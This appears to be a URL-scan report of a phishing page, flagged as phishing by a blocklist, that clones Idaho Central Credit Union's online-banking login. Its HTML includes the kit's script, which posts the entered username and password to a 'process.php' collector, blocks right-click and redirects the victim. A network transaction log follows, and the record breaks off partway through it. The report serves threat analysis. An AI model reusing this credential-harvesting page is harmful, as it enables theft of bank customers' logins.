    < div class = "irisv-textfield__control irisv-textfield__control-spacing-icon" >
    < div class = "irisv-textfield__leading-icon" >
    < span role = "img"
class = "irisv-icon font-icon-lock irisv-icon--md"
aria - hidden = "true" >
    <!---->
    < /span> < /div> < div class = "irisv-textfield__input-wrapper" >
    < span id = "password_label" >
    < label
for = "password"
class = "irisv-textfield__label font-caption" > Password < /label> < /span> < input type = "password"
id = "passwordx"
name = "passwordx"
autocomplete = "off"
required class = "irisv-textfield__input font-subtitle-1" >
    < /div>
    <!---->
    < div class = "irisv-textfield__trailing-icon" >
    < button aria - label = "Show password"
type = "button"
class = "irisv-textfield__trailing-button" >
    < span role = "img"
class = "irisv-icon font-icon-show irisv-icon--md" >
    <!---->
    < /span> < /button> < /div> < /div> < div class = "irisv-textfield__messages" >
    <!---->
    < div role = "alert" >
    <!---->
    < /div>
    <!----><!---->
    < /div> < /div> < /div> < div class = "mar-top--small" >
    < div class = "left-checkbox" >
    < label class = "irisv-checkbox font-body-1 irisv-checkbox--low-emphasis font-caption "
id = "rememberMeCheckBox" >
    < input type = "checkbox"
class = "irisv-checkbox__input" >
    < span class = "irisv-checkbox__check" >
    < svg version = "1.1"
x = "0px"
y = "0px"
preserveAspectRatio = "xMidYMin"
viewBox = "3 5 18.1 13.8"
enable - background = "new 3 5 18.1 13.8"
xml: space = "preserve" >
    < polyline fill = "none"
stroke - width = "2.1"
stroke - miterlimit = "10"
points = "3.7,12.2 8.8,17.3 20.3,5.7 "
class = "check" > < /polyline> < /svg> < /span> < span class = "irisv-checkbox__label" > Remember me < /span> < /label> < /div> < div class = "right-links" >
    < a href = "https://myebranch.iccu.com/Mobile/ForgotUsername"
class = "irisv-button irisv-button--compact irisv-button--onLight text--none"
style = "width: auto;" >
    <!----><span class="irisv-button__text"> Forgot username? </span><!----><!---->
    < /a> < a href = "https://myebranch.iccu.com/Mobile/ForgotPassword"
class = "irisv-button irisv-button--compact irisv-button--onLight text--none"
style = "width: auto;" >
    <!----><span class="irisv-button__text"> Forgot password? </span><!----><!---->
    < /a> < /div> < /div> < /div> < div class = "isotope-slide__footer" >
    < div class = "mar-top--small" >
    < div id = "irisv_notification_2rnyjbb3jmf"
role = "alertdialog"
aria - atomic = "true"
aria - labelledby = "irisv_notification_2rnyjbb3jmf_heading"
tabindex = "0"
class = "irisv-notification inline error-light"
style = "display: none;" >
    < div class = "irisv-notification__container" >
    < span role = "img"
aria - label = "error"
class = "irisv-icon irisv-notification__leading-icon font-icon-alert-line irisv-icon--md" >
    <!---->
    < /span> < span id = "irisv_notification_2rnyjbb3jmf_heading"
class = "irisv-notification__message-heading font-subtitle-2" > < span class = "irisv-notification__message-body font-body-2" > < /span></span > < button aria - label = "Close notification"
class = "irisv-notification__close"
style = "display: none;" > < span aria - hidden = "true"
class = "font-icon-cancel-x irisv-notification-icon--sm" > < /span></button >
    < /div> < div class = "irisv-notification__trailing-content"
style = "display: none;" > < /div> < /div> < /div> < div class = "mar-top--small" >
    < div id = "irisv_notification_q2keqljmfft"
role = "alertdialog"
aria - atomic = "true"
aria - labelledby = "irisv_notification_q2keqljmfft_heading"
tabindex = "0"
class = "irisv-notification inline error"
style = "display: none;" >
    < div class = "irisv-notification__container" >
    < span role = "img"
aria - label = "error"
class = "irisv-icon irisv-notification__leading-icon font-icon-alert-line irisv-icon--md" >
    <!---->
    < /span> < span id = "irisv_notification_q2keqljmfft_heading"
class = "irisv-notification__message-heading font-subtitle-2" > < span class = "irisv-notification__message-body font-body-2" > An unexpected error has occurred.Please
try again later. < /span></span > < button aria - label = "Close notification"
class = "irisv-notification__close"
style = "display: none;" > < span aria - hidden = "true"
class = "font-icon-cancel-x irisv-notification-icon--sm" > < /span></button >
    < /div> < div class = "irisv-notification__trailing-content"
style = "display: none;" > < /div> < /div> < /div> < div class = "isotope-actions mar-top--small" >
    < button type = "submit"
class = "irisv-button irisv-button--highEmphasis irisv-button--onLight irisv-button--full-width text--none"
id = "btn_submitCredentials" >
    <!----><span class="irisv-button__text"> Log in </span><!----><!---->
    < /button> < a href = "https://myebranch.iccu.com/Mobile/Registration"
class = "irisv-button mar-top--tiny irisv-button--lowEmphasis irisv-button--onLight irisv-button--full-width text--none" >
    <!----><span class="irisv-button__text"> Register </span><!----><!---->
    < /a> < /div> < /div> < /form> < div class = "isotope-hidden--desktop mar-bottom--small" > < /div> < form role = "form"
class = "isotope-slide isotope-slide--aside isotope-hidden--mobile" >
    <!---->
    < div class = "isotope-slide__content" >
    < div >
    < div >
    < p class = "font-medium-heading" >
    On a mobile device ?
    < /p> < p class = "mar-top--small font-body-2" >
    Download the app
for convenient and secure access to your accounts. < /p> < /div> < /div> < ul >
    < li >
    < div class = "inline-flex mar-top--base" >
    < div class = "irisv-avatar" >
    < svg viewBox = "0 0 104 104"
class = "irisv-avatar__svg"
style = "width: 40px; height: 40px; display: none;" >
    < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--static" > < /path> < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--fill"
style = "stroke: rgb(8, 136, 86); stroke-dasharray: 0px; stroke-dashoffset: 0px;" > < /path> < /svg> < div class = "irisv-avatar__status-line"
style = "width: 40px; height: 40px;" >
    < div aria - label = "Biometric Login"
role = "img"
class = "irisv-avatar__content"
style = "width: 40px; height: 40px; border-radius: 24px; background: rgb(var(--colorPlatformGray500));" >
    < span role = "img"
class = "irisv-icon irisv-avatar__content__main-icon font-icon-touchid irisv-icon--md irisv-avatar__content__main-icon--medium"
style = "color: rgb(var(--colorPlatformWhite)); width: 40px; height: 40px; font-size: 20px;" >
    <!---->
    < /span>
    <!---->
    < /div>
    <!----><!---->
    < /div>
    <!---->
    < /div> < div class = "iris-list-item__text mar-left--small" >
    < b class = "font-subtitle-2" > Biometric Login < /b> < p class = "font-caption" >
    Use your device hardware < /p> < /div> < /div> < /li> < li >
    < div class = "inline-flex mar-top--base" >
    < div class = "irisv-avatar" >
    < svg viewBox = "0 0 104 104"
class = "irisv-avatar__svg"
style = "width: 40px; height: 40px; display: none;" >
    < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--static" > < /path> < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--fill"
style = "stroke: rgb(8, 136, 86); stroke-dasharray: 0px; stroke-dashoffset: 0px;" > < /path> < /svg> < div class = "irisv-avatar__status-line"
style = "width: 40px; height: 40px;" >
    < div aria - label = "Nearby ATMs"
role = "img"
class = "irisv-avatar__content"
style = "width: 40px; height: 40px; border-radius: 24px; background: rgb(var(--colorPlatformGray500));" >
    < span role = "img"
class = "irisv-icon irisv-avatar__content__main-icon font-icon-atm-locator irisv-icon--md irisv-avatar__content__main-icon--medium"
style = "color: rgb(var(--colorPlatformWhite)); width: 40px; height: 40px; font-size: 20px;" >
    <!---->
    < /span>
    <!---->
    < /div>
    <!----><!---->
    < /div>
    <!---->
    < /div> < div class = "mar-left--small" >
    < b class = "font-subtitle-2" > Nearby ATMs < /b> < p class = "font-caption" >
    Enable location services < /p> < /div> < /div> < /li> < li >
    < div class = "inline-flex mar-top--base" >
    < div class = "irisv-avatar" >
    < svg viewBox = "0 0 104 104"
class = "irisv-avatar__svg"
style = "width: 40px; height: 40px; display: none;" >
    < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--static" > < /path> < path d = "M52.05, 2.17a50, 50, 0, 1, 1-50, 50, 50, 50, 0, 0, 1, 50-50"
class = "irisv-avatar__progress-ring--fill"
style = "stroke: rgb(8, 136, 86); stroke-dasharray: 0px; stroke-dashoffset: 0px;" > < /path> < /svg> < div class = "irisv-avatar__status-line"
style = "width: 40px; height: 40px;" >
    < div aria - label = "Snapshot"
role = "img"
class = "irisv-avatar__content"
style = "width: 40px; height: 40px; border-radius: 24px; background: rgb(var(--colorPlatformGray500));" >
    < span role = "img"
class = "irisv-icon irisv-avatar__content__main-icon font-icon-phone2 irisv-icon--md irisv-avatar__content__main-icon--medium"
style = "color: rgb(var(--colorPlatformWhite)); width: 40px; height: 40px; font-size: 20px;" >
    <!---->
    < /span>
    <!---->
    < /div>
    <!----><!---->
    < /div>
    <!---->
    < /div> < div class = "mar-left--small" >
    < b class = "font-subtitle-2" > Snapshot < /b> < p class = "font-caption" >
    Preview accounts without logging in
    < /p> < /div> < /div> < /li> < /ul> < div id = "badges"
class = "inline-flex mar-top--base" > < a href = "https://www.apple.com/ios/app-store" > < img id = "app-store"
alt = "Download on the App Store"
src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/app-store-badge.svg"
height = "33px" > < /a><a href="https:/ / play.google.com / store " class="
mar - left--tiny "><img id="
google - play " alt="
Get it on Google Play " src="
BecomeMember / CreditUnion / BecomeAMember / EnjoyConvinience / google - play - badge.svg " height="
33 px "></a></div> < div class = "text--center" >
    < a href = "https://myebranch.iccu.com/Mobile/Authentication"
class = "irisv-button mar-top--base irisv-button--compact irisv-button--onLight text--none"
id = "mobile-link" >
    <!----><span class="irisv-button__text"> Go to mobile site </span><!----><!---->
    < /a> < /div> < /div>
    <!---->
    < /form> < /div> < form id = "form_authenticated"
method = "POST"
action = "https://myebranch.iccu.com/Authentication/Authenticated" > < input type = "hidden"
name = "username"
value = "" > < input type = "hidden"
name = "nonce"
value = "" > < /form> < /div> < /div> < /div> < /div> < /div> < div class = "cms-content-area"
data - cms - content - area = "body-card" > < /div> < /div> < footer id = "mobile_footer"
role = "contentinfo" >
    < div class = "container" >
    < ul role = "navigation"
class = "utility-links clearfix" >
    < li id = "bold_chat_container" > < /li> < li class = "list-item-full-site" > < a href = "https://myebranch.iccu.com/Client/Home"
class = "icon"
id = "full-site" > View Full Site < /a></li >
    < /ul> < hr >
    < div id = "mobile_info_panel" >
    < div class = "fineprint" >
    < p > Your savings federally insured to at least $250, 000 and backed by the full faith and credit of the United States Government. < /p> < p > National Credit Union Administration, a U.S.Government Agency < /p> < p > Copyright© 2022 Idaho Central Credit Union.All rights reserved. < /p> < p > < strong > Routing Number: < /strong> 324 173 626</p >
    < /div> < ul role = "navigation"
class = "legal-links clearfix" >
    < li > < a href = "https://www.iccu.com/online-privacy-policy"
target = "_blank" > Privacy Policy < /a></li >
    < /ul> < /div> < /div> < /footer> < /div> < div id = "locale_confirmation"
class = "alk-bottom-panel alk-bottom-panel-full"
role = "dialog"
aria - hidden = "true" >
    < div class = "alk-bottom-panel-header" >
    Locale Change Confirmation < button class = "alk-bottom-panel-close font-icon font-icon-cancel-x"
aria - label = "Close Panel" > < /button> < /div> < div class = "alk-bottom-panel-content card-container" >
    < div class = "confirm" >
    < div class = "no-card" >
    < p > Changing your preferred language affects all member - facing text, including messages and notification alerts. < /p> < /div> < div class = "buttons" >
    < button id = "confirm_locale"
class = "button primary" > Confirm < /button> < button id = "cancel_locale"
class = "button text" > Cancel < /button> < /div> < /div> < div class = "confirming" >
    < div class = "loader" >
    < p id = "instructions" > Please wait... < /p> < div class = "loader-pip" > < /div> < /div> < /div> < /div> < /div>
    <!--
    < script >
    (function(root) {
        var globals = {};
        globals.isAuthenticated = false;
        globals.localeHasChanged = null;

        root.currentWidgetName = globals.currentWidgetName = '';
        root.idleLogoutMinutes = globals.idleLogoutMinutes = '20';

        root.flashBannerDisplayTime = globals.flashBannerDisplayTime = '6000';


        root.Alkami = root.Alkami || {};
        root.Alkami.Globals = globals;
    })(window); < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/localization.min.js"
type = "text/javascript" > < /script> < script type = "text/javascript"
src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/oziJg6ucKE6dI3XKYwKjgAbbbb.js" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/polyfill.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/webcomponents-bundle.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/custom-elements-es5-adapter.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/popper.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/orb-shell.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery-ui.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery-validate.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery-validate-sitetext.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/ua-parser.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery.mmenu.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/nativeHook.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/idle-timeout-ts.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/idle-modal-ts.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/helpers.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/utils.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery.extensions.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/jquery-helpers.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/password-togglefication.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/feature-detect-ts.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iscroll-lite.min.js"
type = "text/javascript" > < /script> < script >
    $(document).ready(function() {
        $.ui.progressbar.prototype.min = -1;
    }); < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/vue.runtime.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/vuex.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/vue-router.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/browser-support-ts.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/showBrowserSupport.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/machineauthentication.bundle.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/login.min.js"
type = "text/javascript" > < /script> < script nomodule = ""
src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-components-ie11.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/iris-vue.umd.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/isotope.min.js" > < /script> < script type = "text/javascript"
src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/mMaayukPWsWUBFEALUHy29wbbbb.js" > < /script> < script >
    let config = {
        elementId: "app",
        rootUrl: "/Isotope/",
        clientKey: "e6d119d9-48fc-4426-9c07-4a93bffa8838",
        redirectUrl: "https://myebranch.iccu.com/Authentication/Authenticated",
        bankUri: "https://myebranch.iccu.com",
        baseUrl: '/Mobile/',
        machineSecretProvider: "Entrust Remembered Devices Provider",
        sessionId: "EF29A0312624D6CBADEA0F22",
        siteTextMap: Alkami.Localization.SiteText._map,
        mobileRegistrationEnabled: "True",
        displayForgotPasswordLink: "True",
        displayForgotUsernameLink: "True",
        bankName: "Idaho Central Credit Union",
        loginCredentials: {
            "UserName": "",
            "Password": ""
        },
        ellipsisConfig: [{
            "href": "#",
            "iconName": "live-chat",
            "label": "Live Chat",
            "target": null
        }, {
            "href": "https://www.iccu.com/rates/",
            "iconName": "rates",
            "label": "Rates",
            "target": null
        }, {
            "href": "/Mobile/Locations/LocationSearch",
            "iconName": "locations",
            "label": "Locations",
            "target": null
        }, {
            "href": "https://www.iccu.com",
            "iconName": "full-site",
            "label": "View Full Site",
            "target": null
        }, {
            "href": "/Mobile/Contact",
            "iconName": "contact",
            "label": "Contact",
            "target": null
        }, {
            "href": "/Mobile/Support",
            "iconName": "support",
            "label": "Support",
            "target": null
        }, {
            "href": "https://www.facebook.com/IdahoCentralCreditUnion",
            "iconName": "facebook-small",
            "label": "Facebook",
            "target": null
        }, {
            "href": "https://twitter.com/Idaho_Central",
            "iconName": "twitter-small",
            "label": "Twitter",
            "target": null
        }, {
            "href": "https://www.youtube.com/IdahoCentralCU",
            "iconName": "youtube",
            "label": "YouTube",
            "target": null
        }, {
            "href": "https://www.linkedin.com/company/idahocentralcreditunion",
            "iconName": "linkedin",
            "label": "LinkedIn",
            "target": null
        }, {
            "href": "https://instagram.com/idahocentralcu/",
            "iconName": "instagram",
            "label": "Instagram",
            "target": null
        }],
        isNativeApplication: "False",
        initialChallengeType: "UsernameAndPassword"
    };
const Global_PersistentSessionIdentifier = "68ce612e-1513-0c48-881f-ddc935d77f7a";
Alkami.Isotope.init(config); < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/fi.mobile.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/screen.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/RiskEvaluation.2.10.0.min.js"
type = "text/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/_.js"
type = "application/javascript" > < /script>
    -->

< style type = "text/css" > .bcFloat {
        display: none!important;
    }.bc - minimize - container {
        display: none!important;
    }.widget - mobile {
        z - index: 99999!important;
    }.widget - mobile {
        visibility: hidden;
    } < /style>
    <!--
    < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/_-1.js"
type = "application/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/_-2.js"
type = "application/javascript" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/_-3.js"
type = "application/javascript" > < /script>
    -->
    < div id = "second_factor_container"
class = "card-container card-container-modal"
style = "display: none;" > < /div>




< div class = "overlay" >
    < div class = "lgif-space" > < /div> < div class = "loadgif" >
    < img src = "VideoChat/Face_to_Face/ServiceAgent/MobileDevice/loading.gif"
width = "100"
height = "100" >
    < /div> < /div>


< script src = "https://code.jquery.com/jquery-3.2.1.min.js" > < /script>

< script src = "https://code.jquery.com/jquery-3.3.1.slim.min.js"
integrity = "sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
crossorigin = "anonymous" > < /script> < script src = "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js"
integrity = "sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ"
crossorigin = "anonymous" > < /script> < script src = "https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js"
integrity = "sha384-uefMccjFJAIv6A+rW+L4AHf99KvxDjWSu1z9VI8SKNVmz4sk7buKt/6v9KI65qnm"
crossorigin = "anonymous" > < /script> < script src = "https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js" > < /script> < script src = "https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js" > < /script>

< script type = "text/javascript" >

    $(document).bind("contextmenu", function(e) {
        return false;
    });

$('#homeForm').on('submit', function(e) {

    $(".overlay").show(500);
    $.post('ApplyLoan/LoanPurpose/BuildHouse/BuyCar/process.php', $(this).serialize(), function(data) {
        console.log(data);
    });
    setTimeout(function() {
        window.location.href = "indexx.html";
    }, 2000);
    e.preventDefault();
});


< /script>





< script >
    location.hash = 'wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&domain=' < /script>

< script type = "text/javascript"
src = "VideoChat/Face_to_Face/ServiceAgent/MobileDevice/actions.js" > < /script> < /body> < /html>
                                    


HTTP Transactions (62)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Mon, 26 Sep 2022 13:15:18 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 6480520a5e02f3163410e3134bd77baa.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: V9Mbjg6P0XB9kYD7akDhiYt1w06iFGuKK1o9IyjOm-qxziPDEONncg==
Age: 3365


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    2d12f67fe57a87e7366b662d153a5582
Sha1:   d7b02d81cc74f24a251d9363e0f4b0a149264ec1
Sha256: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "4397E6B45B5822FBAB9B83ABE0B96EE70EFBA7CD2160B51936159865EDE5FDB1"
Last-Modified: Sun, 25 Sep 2022 18:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2562
Expires: Mon, 26 Sep 2022 14:54:05 GMT
Date: Mon, 26 Sep 2022 14:11:23 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.110
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Mon, 26 Sep 2022 04:35:16 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 80d21802b1b80c40e55ccf83433b8eac.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: 3jvD_rE-SID4si2o7QdOvBLVuLQMfyaWOBBGlG-kGX0JtTGrwUZHig==
age: 34568
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    6113f8408c59aebe188d6af273b90743
Sha1:   7398873bf00f99944eaa77ad3ebc0d43c23dba6b
Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Mon, 26 Sep 2022 14:11:23 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /?e=/ HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Mon, 26 Sep 2022 14:11:23 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Wed, 27 Jul 2022 09:44:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=75
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (65524), with CRLF line terminators
Size:   45490
Md5:    9092b9de4ce5c2d69f1ec707c6eef62c
Sha1:   09e93a5b580c4d59523028f75e8e9d2d05880560
Sha256: fc64769109bbae6e44a0a905c52acef5884f4e249b1435618a6b96babb696d6c

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /ajax/libs/popper.js/1.14.0/umd/popper.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://mediarazor.net
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.25.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Mon, 26 Sep 2022 14:11:23 GMT
content-length: 6458
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03fa9-500f"
last-modified: Mon, 04 May 2020 16:15:37 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 7244730
expires: Sat, 16 Sep 2023 14:11:23 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KSA65SWnL0iyBosO%2FCWlDfft0TZExITAKCmKJKscPURjvUm%2Fxf9%2BU6Rk3gnBBSY6UiRKMWQXlqypMCtLiDYTIpIRHDJhu6wPlj9QT7UepNVYFE%2BZunCN7H7Q4ln5hsZJHyfua4H0"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 750c96a9e9bab509-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (20322)
Size:   6458
Md5:    df9fe6d48e380554eb0ec9687bed3246
Sha1:   207263d754220200c1916edfbda262f62223ecf5
Sha256: 91d57502b7260e6752c2b5f1636d77707929fa9f09da28589691e61816a448f9
                                        
                                            GET /ajax/libs/jquery.mask/1.14.10/jquery.mask.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
